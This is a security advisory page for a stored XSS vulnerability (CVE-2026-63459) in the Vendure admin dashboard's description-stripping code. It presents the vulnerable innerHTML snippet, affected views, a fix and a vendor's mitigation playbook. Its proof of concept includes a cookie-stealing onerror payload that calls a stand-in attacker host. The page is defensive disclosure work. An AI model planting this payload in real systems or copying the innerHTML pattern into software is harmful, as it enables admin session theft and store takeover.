Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
📦
📦 npm
Not in CISA KEV
HIGH severity

CVE-2026-63459 @vendure/dashboard

HIGHFix: vendurehq/vendure@d7aa42a

CVE-2026-63459 is a high-severity (CVSS 8.7) Cross-site Scripting (XSS) vulnerability in @vendure/dashboard. A fix is available for @vendure/dashboard — see the affected versions and patch details below.

Vendure has stored XSS in the Admin Dashboard via unsafe HTML-stripping (innerHTML) of entity descriptions

Published
Sep 17, 2026
Updated
Sep 17, 2026
Affected
1 pkg
Patched
1 / 1
Exploits
None indexed
Exploitation data as of Sep 17, 2026 · OSV.dev, NVD, FIRST.org (EPSS)

Real-World Exposure

1 pkg affected

How broadly this vulnerability is actually deployed: weekly install volume shows current usage, and reverse-dependency count shows how many other packages break if it stays unpatched.

0other npm packages depend on this — each one inherits the vulnerability until it's patched upstream
@vendure/dashboardnpm
16Kdownloads / week

Description

Stored XSS in the Admin Dashboard via unsafe HTML-stripping (innerHTML) of entity descriptions

Package: @vendure/dashboard (vendure-ecommerce/vendure, latest master) ·

Summary

The dashboard's RichTextDescriptionCell "strips HTML" from an entity's description by assigning it to a live element's innerHTML and reading back textContent. This pattern still executes active markup: a description containing <img src=x onerror=…> runs script when the element is parsed (image resource loads even on a detached node in Chromium/Firefox, firing onerror). Because description is an admin-settable field shown in multiple list views, a lower-privilege administrator can store a payload that executes in a higher-privilege administrator's browser when they open the corresponding list — stored XSS leading to admin-session compromise.

Vulnerable code

packages/dashboard/src/lib/components/shared/table-cell/order-table-cell-components.tsx

export const RichTextDescriptionCell: DataTableCellComponent<{ description: string }> = ({ cell }) => {
    const value = cell.getValue();
    const textContent = useMemo(() => {
        if (!value) return '';
        const div = document.createElement('div');
        div.innerHTML = value;          // line 51 — parses/loads active markup; <img onerror> fires here
        return div.textContent ?? '';   // line 52 — reading textContent does NOT undo the side effect
    }, [value]);
    ...
}

innerHTML does not run <script>, but it does trigger resource loads / event handlers such as <img src=x onerror=...>, <image>, <svg> handlers — even on a detached element — so the assignment itself is the sink. Reading textContent afterwards is irrelevant; the handler has already executed.

Reachable from (all use this cell for the description column)

  • _products/products.tsx:53, _collections/collections.tsx, _promotions/promotions.tsx:62, _payment-methods/payment-methods.tsx:57, _shipping-methods/shipping-methods.tsx:39.

All of these are description fields editable by administrators with the corresponding catalog/promotion/settings write permissions — which, in Vendure's multi-channel model, includes channel-scoped admins.

Proof of concept

  1. As an administrator with UpdateCatalog/UpdateProduct (e.g. a channel-scoped admin), set a Product's description to: <img src=x onerror="fetch('https://attacker.example/'+encodeURIComponent(document.cookie))">
  2. Any administrator who opens the Products list in the dashboard renders RichTextDescriptionCell for that row → div.innerHTML = description → the onerror executes in their session.
  3. Payload runs with the viewing admin's privileges (e.g. a superadmin) → session/token exfiltration or admin actions → cross-privilege / cross-channel admin takeover (chains directly with the channel-scoping IDOR class already reported).

Impact

Stored XSS executing in administrators' browsers, escalating a low-privilege (e.g. single-channel) admin to actions as any admin who views the affected list. Account/store takeover.

Suggested fix

Strip HTML with an inert parser (no script/resource execution) instead of a live element, or sanitize before display:

// inert: DOMParser documents do not execute scripts or load resources
const textContent = new DOMParser().parseFromString(value ?? '', 'text/html').body.textContent ?? '';

(Or render with a vetted sanitizer such as DOMPurify if rich text must be shown.) Audit the codebase for other element.innerHTML = <untrusted> assignments used for "stripping".

Affected Packages

1 total 1 fixed
EcosystemPackageVulnerable rangeFix
📦npm@vendure/dashboardall versions3.6.5npm install @vendure/dashboard@3.6.5

Detection & mitigation playbook

Open-source dependency
  1. Detect

    Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for @vendure/dashboard, including transitive dependencies — a direct dependency you never call can still pull in a vulnerable version.

  2. Fix

    Update @vendure/dashboard to 3.6.5 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms CVE-2026-63459 is resolved across your whole dependency graph.

  3. Workarounds

    If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

  4. How O3 protects you

    O3 Security's impact-aware SCA analyses which vulnerable code paths your application actually calls, so a match like CVE-2026-63459 can be triaged on real exposure rather than presence alone.

Tailored to CVE-2026-63459. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

# Stored XSS in the Admin Dashboard via unsafe HTML-stripping (`innerHTML`) of entity descriptions **Package:** @vendure/dashboard (vendure-ecommerce/vendure, latest master) · ## Summary The dashboard's `RichTextDescriptionCell` "strips HTML" from an entity's `description` by assigning it to a live element's `innerHTML` and reading back `textContent`. This pattern still **executes** active markup: a `description` containing `<img src=x onerror=…>` runs script when the element is parsed (image resource loads even on a detached node in Chromium/Firefox, firing `onerror`). Because `description
O3 Security · Impact-Aware SCA

Is CVE-2026-63459 in your dependencies?

O3 Security finds CVE-2026-63459 across npm dependencies, including transitive ones, and its impact-aware SCA ranks findings by whether your code actually calls the vulnerable path.

CVE-2026-63459: XSS (High 8.7) | O3 Security